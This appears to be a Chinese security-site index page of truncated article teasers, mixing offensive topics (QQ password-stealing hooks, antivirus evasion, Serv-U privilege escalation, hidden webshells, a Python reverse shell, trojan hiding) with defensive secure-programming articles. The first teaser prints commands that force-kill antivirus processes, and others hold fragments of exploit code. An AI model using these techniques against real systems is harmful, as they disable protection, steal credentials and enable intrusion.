绕过杀毒软件防御：运行(“taskkill/f/imkavsvc.exe”,假,1)运行(“taskkill/f/imKVXP.kxp”,假,1)运行(“taskkill/f/imRav.exe”,假,1)运行(“taskkill/f/imRavmon.exe”,假,1)运行(“taskkill/f/imMcshiel...

[阅读全文]

在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了，这就是下面的第四部分内容　　处理密码　　如果您读到了此处，我想得暂停一会，先让我来帮你回忆一下前面提到的几个关键的变量　　第一个：QQ号的子窗口句柄g_hNum　　第二个：QQ密码的子窗口句柄g_hPsw//此部分暂时不使用，下面　　第三个：存键盘按键的pms...

[阅读全文]

有时候正常的线程代码也被查杀，因为有了前例，杀软记住了，免杀一些资料不过增加nop，修改工程名函数名资源名的时代早过了，nod32不好过。1：加垃圾汇编代码。其实许多的朋友都是知道的，Delphi支持在代码中嵌套汇编代码。也就是说，如果加入了垃圾汇编代码，就网网可以直接过免杀。例如：asmnopnopnopend;这样...

[阅读全文]

在学习本文前，你需要一点点的VBS基础，WMI了解常识，COM接口皮毛就行。今天的问题是，如何获得系统中安装的杀毒软件？有人会说遍历注册表之类的。其实用不着这么麻烦。每个正式的AV（Anti-Virus）软件，都要向系统注册自己。通过查看WMI中的\root\SecurityCenter这个名称空间，我们就能知道其中装...

[阅读全文]

serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\LocalAdministratorDomain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以...

[阅读全文]

一天晚上，刚刚打开QQ，就看到小企鹅的图标不断闪动，原来是一迷上脚本攻击的学生发来的求救消息：“获得了一个WebShell，但是可能服务器在IIS里限制了上传文件大小，cmd.exe就是传不上去，小一点的文件都可以传，是什么原因啊？”。没有哪个网管会BT到在IIS中把文件上传大小限制得连289K的Cmd.exe也传不上...

[阅读全文]

用批处理实现删除3389终端服务（mstsc）的登陆记录1、运行注册表regedit，进入到HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Default项，在右边窗口有若干个MRU+数字的数据，删除就可以了2、然后再删除我的文档(MyDocument...

[阅读全文]

sql_inj.java为一个改进的防注入bean，编译后将class文件放在tomcat的classes下的sql_inj目录中。sql_inj.java代码：=packagesql_inj;importjava.net.*;importjava.io.*;importjava.sql.*;importjava.te...

[阅读全文]

首先呢，要说说Base64编码。Base64编码是一种加密/解密字符串的算法他可以把一段字符串A通过特定的加密算法变成字符串B并且单凭你的肉眼是无法通过B来反推出A来但通过逆推算法便能很迅速的将字符串B转换为字符串A这就是加密/解密字符串的算法。简单的来说，Base64编码的特点就是加密解密速度快，并且须通过特定算法解...

[阅读全文]

WordPress系统的用户密码是保存在wp_users数据表的user_pass字段，密码是通过PortablePHPpasswordhashingframework类产生的，密码的形式是随机且不可逆，同一个明文的密码在不同时间，产生的密文也不一样，相对来说较为安全。　　WordPress用户密码产生的过程是，当需要...

[阅读全文]

如果想在自己的应用程序中加入操作系统的Format（格式化）功能，就象系统的那个formatutility，应该怎么做呢？用Google搜索的话，中文资料最多的一篇是《磁盘格式化的编程实现》，讲的是借用SHFormatDrive函数来调用系统的格式化工具完成格式化功能。有没有办法使用自己的代码实现呢？参考sysinte...

[阅读全文]

方法:将代码复制到记事本中,另存为xx.bat到桌面,然后点击打开即可开始查杀,如果有什么问题的话,请给我留言,谢谢!代码如下:@echooffCOLOR9FTITLE☆U盘病毒专杀☆代码制作:第二战区echo.echo☆U盘病毒专杀☆QQ:373895919echo.echohttp://hi.baidu.com/s...

[阅读全文]

了解什么是竞争条件，以及它们为什么会引发安全问题。本文向您展示了如何在类UNIX®（Unix-like）系统中处理常见的竞争条件，包括如何正确地创建锁文件、锁文件的替代者，如何处理文件系统，以及如何处理共享目录（特别是如何在/tmp目录下正确创建临时目录）。需要您对信号处理稍有了解。通过一个偷窃而来的口令，Ma...

[阅读全文]

安全的程序必须最小化特权，以降低bug转化为安全缺陷的可能性。本文讨论了如何通过最小化有特权的模块、授与的特权以及特权的有效时间来最小化特权。文章不仅讨论了一些传统的类UNIX特权机制，还讨论了较新的机制，如FreeBSD的jail()，Linux安全模块（LinuxSecurityModules，LSM）框架，以及S...

[阅读全文]

应用程序通常都会调用其他组件，例如底层的操作系统、数据库系统、可重用的库、Internet服务（例如DNS）、Web服务，等等。本文通过讨论只使用安全组件、只传递有效数据，确保数据可以正确进行处理，检查返回值和异常情况，并且当数据在应用程序和组件之间传递时对数据进行保护，从而解释如何防止攻击者利用对其他组件的调用。查看...

[阅读全文]

本文论述了数据进入您的程序的各种途径，重点是如何适当地对它们进行处理；您甚至可能还没有了解它们全部！本文首先论述了如何设计程序来限制数据可以进入您的程序的途径，以及您的设计会如何影响哪些可以成为输入。然后论述了各种不同的输入通道以及如何使用这些通道，包括环境变量、文件、文件描述符、命令行、图形用户界面（GUI）、网络数...

[阅读全文]

本文介绍了如何验证输入――任何安全程序的首要环节之一。2003年7月，计算机应急反应小组协调中心报告了MicrosoftWindows的DirectXMIDI库中一组危险的漏洞。DirectXMIDI库是用于播放MIDI格式音乐的底层Windows库。不幸的是，这个库没有能力去检查MIDI文件中的所有数据值；text、...

[阅读全文]

在当今联网的世界中，软件开发人员必须知道如何编写安全的程序，然而人们还未广泛认识到这一信息，也未向人们广泛讲授过这一信息。本文介绍了如何编写安全的应用程序的基本思想，并讨论了如何针对特定的应用程序确定安全性需求。欢迎来到不太友善的世界　　案例#1味道闻起来很糟糕。两个多月以来，数十万加仑的污水流到了澳大利亚的公园、河流...

[阅读全文]

本文讨论Linux/UNIX系统中最常见的缺陷：缓冲区溢出。首先解释什么是缓冲区溢出，以及它们为何如此常见和如此危险。然后讨论广泛用于解决缓冲区溢出的新Linux和UNIX方法――以及为什么这些方法还不足够。随后将展示C/C++程序中防止缓冲区溢出的各种方法，同时包括静态调整大小的方法（比如标准的C库和OpenBSD/...

[阅读全文]

新建一fvck.adm文件，写入如下内容：CLASSUSERCATEGORY"AdobeReader"POLICY"Version8.0JavaScriptSettings"KEYNAME"SOFTWARE\Adobe\AcrobatReader\8.0\JSPrefs"PART"EnableJavaScript"CH...

[阅读全文]

很多入侵者都会在正面遇到防火墙之后，采用反向链接的方法控制远程服务器。早期大家都用perl或c代码写。现在大家都与时俱进了，用python写了。代码量减少很多啊。小雨写的一个，替代之前的perl版本的，可以直接返回ttyshell。返回的shell可以直接ssh，su等操作。代码如下：#!/usr/bin/python...

[阅读全文]

代码接上篇：intfind_safe_offset(intINT_A){intINT_B=0;do{INT_A-=0x01010101;INT_B+=0x01010101;}while(((INT_A&0x000000ff)==0)((INT_A&0x0000ff00)==0)((INT_A&0x00ff0000)==...

[阅读全文]

今天下午几乎所有群里都在讨论StefanEsser抛出来的一个expbanner。他将在明天的syscan大会上公布。http://pastebin.com/mXGidCsd$./exploit.py-hhttp://t.testsystem/PHPxxx()RemoteCodeExecutionExploit(Tik...

[阅读全文]

本文主要介绍如何在程序中实现IP地址的隐藏。其实这篇东西不算我写的。其中《IP头结构》部分我懒得打字，故复制、粘贴了孤独剑客的文章，先说声谢谢！代码部分参考了外国程序xes写的一个程序。所以这只是学习过程中的一个副产品。既然程序已经做好了，就顺便放上来跟大家一起交流，共同提高吧。本文只不过想说明一下IP数据的结构和发送...

[阅读全文]

需要收集点主机上的信息，以前曾经看过很多朋友写过类似的代码，可惜就是找不到，没办法自己写吧，主要是收集目标的系统以及浏览器等等，代码如下<%testfile=Server.MapPath("createfile.dat")ip=request.ServerVariables("REMOTE_ADDR")httphead...

[阅读全文]

以下在文章中出现的内容皆从技术角度探讨问题，请勿使用下文所提到的技术从事非法行为！Thursday,July01,2010我的上一篇博客《检测本地是否登录了指定QQ》中介绍了通过QQ官方页面来获取已登陆QQ信息的方法，通过对QQ页面中js文件的研究，我们可以更进一步的获取到更多信息！下面我们就来一步一步分析下，首先来看...

[阅读全文]

先管理员防范WebShell的技术也有所提高，以前那种直接放上一个WebShell的时代离我们而去了，现在的WebShell越来越注重隐蔽性。WebShell的隐藏技术也发展得很快，从改变代码大小写到C/S模式，都是牛人们智慧的结晶。说到C/S模式，是不是让你想起ASP下那个"ExecuteRequest("#")"一...

[阅读全文]

//借助LLYFSpy模拟流氓软件捆绑强制安装程序过程//实现IS6.5第一步自动安装程序//codebygt2333588#include"windows.h"#include"stdio.h"intmain(){HWNDProWnd=NULL,ButtonWnd=NULL;PROCESS_INFORMATIONPI...

[阅读全文]

飞信2010出了有一段时间了，但到现在也只是beta版，所以就没怎么关注它，今天下载了一个分析了一下它的协议，才发现飞信迟迟不推出新版本是因为它的协议有了比较大的变动，似乎想要把我们这些山寨货赶尽杀绝，也就是传说中的V4版本的协议，很多信令后面都加上了V4标志，这也意味着想要适应2010，协议部分就必须重写。飞信的登录...

[阅读全文]

此类黑软仍然属于应用程序，其本质是基于套接字的网络通讯程序。因此黑客能成功攻击被感染计算机的一个非常必要的先决条件就是此时被攻击方已经有木马程序的服务端在运行。由于木马程序是一种恶意程序，能在被攻击者没有察觉的情况下悄悄启动运行为攻击者打开后门，故显然不能象其他程序一样堂而皇之的显示在任务栏和任务列表中，否则会立即为用...

[阅读全文]